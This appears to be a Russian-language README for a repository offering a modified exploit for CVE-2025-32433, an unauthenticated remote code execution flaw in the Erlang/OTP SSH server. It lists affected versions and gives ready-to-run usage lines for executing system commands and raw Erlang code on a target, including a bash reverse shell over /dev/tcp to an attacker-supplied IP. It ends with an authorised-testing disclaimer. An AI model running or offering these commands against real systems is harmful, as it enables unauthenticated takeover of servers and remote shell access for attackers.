
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility
Удаленное выполнение кода без аутентификации в Erlang/OTP SSH
Этот репозиторий содержит эксплойт для CVE-2025-32433, критической уязвимости удаленного выполнения кода без аутентификации в SSH-сервере Erlang/OTP.
Ключевые особенности:
CVE ID: CVE-2025-32433
Серьезность: Критическая
Влияние: Удаленное выполнение кода без аутентификации
Уязвимость позволяет злоумышленникам выполнять произвольные системные команды на SSH-серверах Erlang/OTP без аутентификации, отправляя специально сформированные сообщения протокола SSH.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 и старше (вероятно)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target IP-адрес цели (по умолчанию: 127.0.0.1)
-p, --port Порт цели (по умолчанию: 2222)
-c, --command Системная команда для выполнения
-e, --erlang Исходный код Erlang для выполнения
Эта версия исправляет проблему с кодировкой, присутствующую в оригинальном эксплойте:
Проблема: В оригинальном эксплойте использовался символ галочки Unicode (✓, U+2713), что вызывает ошибки кодировки GBK в Windows:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Решение: Заменен символ Unicode на стандартный символ ASCII + для кроссплатформенной совместимости.
Эксплойт работает следующим образом:
os:cmd()Данный эксплойт предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Используйте ответственно и только на системах, на тестирование которых у вас есть явное разрешение.
Лицензия MIT
Модифицировано для совместимости с Windows пользователем chuzouX